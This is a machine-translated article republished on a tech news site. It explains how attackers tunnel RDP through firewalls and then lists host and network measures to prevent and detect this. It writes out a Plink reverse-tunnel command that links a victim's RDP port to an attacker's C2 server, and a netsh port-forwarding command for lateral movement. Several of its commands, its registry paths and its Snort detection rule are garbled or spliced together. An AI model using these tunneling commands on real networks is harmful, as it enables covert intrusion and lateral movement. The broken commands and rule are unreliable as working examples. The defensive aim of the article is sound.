Shulou(Shulou.com)06/02 Report--

In this issue, Xiaobian will bring you about how to bypass network restrictions through RDP tunnels. The article is rich in content and analyzed and described from a professional perspective. After reading this article, I hope you can gain something.

Remote Desktop Services is a component of Windows that is used by various companies to provide convenience to system administrators, operations personnel, and remote employees. On the other hand, remote desktop services, especially Remote Desktop Protocol (RDP), also facilitate network attackers. When an infiltrator establishes a foothold in the target network and obtains sufficient login credentials, they may switch from backdoor to remote access directly using RDP sessions. As attackers gain remote access through legitimate traffic, intrusions become increasingly difficult to detect.

Breaking Network Access Rules with RDP

Attackers prefer the stability and functionality advantages of RDP over non-graphical backdoors, as the backdoor may leave unwanted traces on the system. As a result, FireEye is often able to capture cross-system connectivity behavior in restricted environments by attackers using native Windows RDP remote desktop programs. Traditionally, non-exposed corporate networks protected by firewall and NAT rules were generally considered to be less susceptible to inbound RDP request connections. However, attackers are increasingly using network tunneling and host-based port forwarding to break these network access control rules.

Network tunneling and port forwarding exploit firewall "gaps"(ports that are not protected by firewalls and allow applications to access host services in a firewalled network) to establish connections to remote servers blocked by firewalls. Once a connection to a remote server is established through the firewall, the connection can be used as a transport mechanism to send and receive data through the firewall or to establish a "tunnel" that listens locally for services (located inside the firewall) and makes them accessible to remote servers (located outside the firewall), as shown in Figure 1.

Figure 1: An example of breaching an enterprise firewall using RDP and SSH tunneling

inbound RDP tunnel

Typically, the utility used to establish an RDP session tunnel is PuTTY Link, commonly referred to as Plink. Plink can be used to establish secure SSH network connections with other systems using arbitrary source and destination ports. Since many network environments either do not strictly enforce protocol checks or do not block SSH traffic outbound from their networks, this allows attackers to create encrypted tunnels via Plink, allowing RDP ports on infected systems to communicate with the attacker's C2 server.

Common Plink commands:

plink.exe @ -pw -P 22 -2 -4 -T -N -C -R 12345:127.0.0.1:3389

Figure 2. Successfully creating an RDP tunnel using Plink

Figure 3. Attacker exploits victim's tunnel with C2 server for RDP session

It should be noted that for an attacker to be able to access the RDP port of the target network, they must have been able to access or enter the target network by other means in order to upload programs to establish communication tunnels. For example, an attacker can start with phishing emails and gain a foothold in the target network through malicious programs. After establishing a foothold, gradually collect relevant credentials and upgrade privileges. Tunneling an RDP session into a restricted network environment is one of many common access methods used by attackers.

Progressive penetration via RDP springboard

RDP is not only the perfect tool for external access to the target network, RDP sessions can also connect across multiple systems to move laterally across the environment. FireEye observed that attackers used the netsh network command native to Windows to create RDP port forwarding as a springboard to access another restricted network segment.

netsh port forwarding command:

netsh interface portproxy add v4tov4 listenport=8001 listenaddress= connectport=3389 connectaddress=netsh I p a v l=8001 listena= connectp=3389 c=

For example, an attacker could configure a springboard and listen on arbitrary ports for traffic sent from a previous network. Traffic is then forwarded directly to any system on the other network via the springboard, using designated ports, including the default RDP port TCP 3389. This type of RDP port forwarding provides an attacker with a way to exploit a springboard for routing. And by modifying the registry, it is possible not to interrupt legitimate administrators who are using Springboard during an RDP session.

Figure 4 Lateral movement to other segments via springboard

Prevention and Detection of RDP Tunnels

If RDP is enabled, an attacker can move laterally and maintain presence on the target network via tunneling or port forwarding. To mitigate attack behavior and detect these types of RDP attacks, corporate security operations personnel should focus on host-based and network-based protection and detection mechanisms.

Host-based protection:

Remote Desktop Services: Disable Remote Desktop Services on all end-user workstations and systems when remote connectivity is not required.

Host-based firewall: Enable host-based firewall rules to explicitly deny inbound RDP connections.

Local accounts: Prevent remote logins using local accounts on workstations by enabling the Deny login through Remote Desktop Services security setting.

Host-based detection:

Registry key:

Look at the registry keys associated with Plink connections, which may store information about identifying specific source and destination addresses. By default, both PuTTY and Plink store session information and previously connected ssh servers in the following registry keys on Windows systems:

HKEY_CURRENT_USER\Software\SimonTatham\PuTTYHKEY_CURRENT_USER\SoftWare\SimonTatham\PuTTY\SshHostKeys

Similarly, the following Windows registry key stores PortProxy configuration created using netsh:

HKEY_CURRENT_USER\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4

Collecting and reviewing these registry entries can identify legitimate and unusual SSH tunneling activity. Further review of the entries may be necessary to confirm the specific use of each information.

Event log:

View the full log of login events. Common RDP login events are contained in the following event logs on Windows systems:

%systemroot%\Windows\System32\winevt\Logs\Microsoft-TerminalServices-LocalSessionmanagerOperational.evtx%systemroot%\Windows\System32\winevt\Logs\Security.evtx

The TerminalServices-LocalSessionManager log contains local or remote login success events identified as EID 21 and contains previously successfully connected RDP sessions identified as EID 25 for successful logouts by legitimate users. The Security log contains a Remote Interactive Login (RDP) event with a success type of 10 and identification of EID 4624. The source IP address recorded as the local host IP address (127.0.0.1 - 127.255.255.255) means that an attacker may use port forwarders to tunnel and log on to port 3389

Check for traces of the `plink.exe` program. Note that attackers can rename programs to avoid detection. Relevant traces include, but are not limited to:

Application Compatibility Cache/Shimcache Application Compatibility Cache

Amcache Amcache.hve records the execution path, last execution time, and SHA1 value of the executing application

Jump Lists Windows 7-10 Use the taskbar to show frequently used or recently used items

Prefetch

Service Events Service eventos

CCM Recently Used Apps from the WMI repository

Registry keys

Web-based prevention:

Remote connection: Forces the connection to be initiated from a specified host or centralized management server in cases where an RDP connection is required.

Domain accounts: Use the "Deny login through Remote Desktop Services" security setting for privileged accounts (such as domain administrators) and service accounts because these types of accounts are often used by attackers to move laterally to sensitive areas of the network.

Network-based detection:

Firewall rules: Review existing firewall rules to identify areas where port forwarding vulnerabilities exist. In addition to preventing the use of port forwarders, internal communication between workstations in the environment should also be monitored. Typically, workstations do not need to communicate directly with each other, and firewall rules can be used to block any such communication unless needed.

Network traffic: Perform content and protocol checks of network traffic. Not all traffic communicated on a given port is normal traffic or protocol compliant traffic. For example, an attacker could establish an RDP tunnel with a remote server using TCP port 80 or 443. An in-depth examination of network traffic may reveal that it's actually not HTTP or HTTPS, but something completely different. Therefore, security operators should closely monitor their network traffic.

Snort rule: When RDP traffic is connected on a certain low port, it may mean that an RDP tunnel has been established. Here are two sample Snort rules that can help security teams identify RDP tunnels in their network traffic.

snortalert tcp any [21,22,23,25,53,80,443,8080] -> any ! 3389 (msg:"RDP - HANDSHAKE [Tunneled msts]"; dsize: any ! 3389 (msg:"RDP - HANDSHAKE [Tunneled]"; flow:established; content:"|c0 00| Duca"; depth:250; content:"rdpdr"; content:"cliprdr"; sid:2; rev:1;) Conclusion

The advent of RDP provides users with greater freedom and interoperability. But as more attackers use RDP to cross access-restricted networks and move laterally, security teams are facing the challenge of distinguishing between legitimate and malicious RDP traffic. Therefore, appropriate host and network-based prevention and detection methods should be adopted to proactively monitor and be able to identify malicious RDP usage.

The above is how to bypass the network restrictions through the RDP tunnel shared by everyone. If there is a similar doubt, please refer to the above analysis for understanding. If you want to know more about it, please pay attention to the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.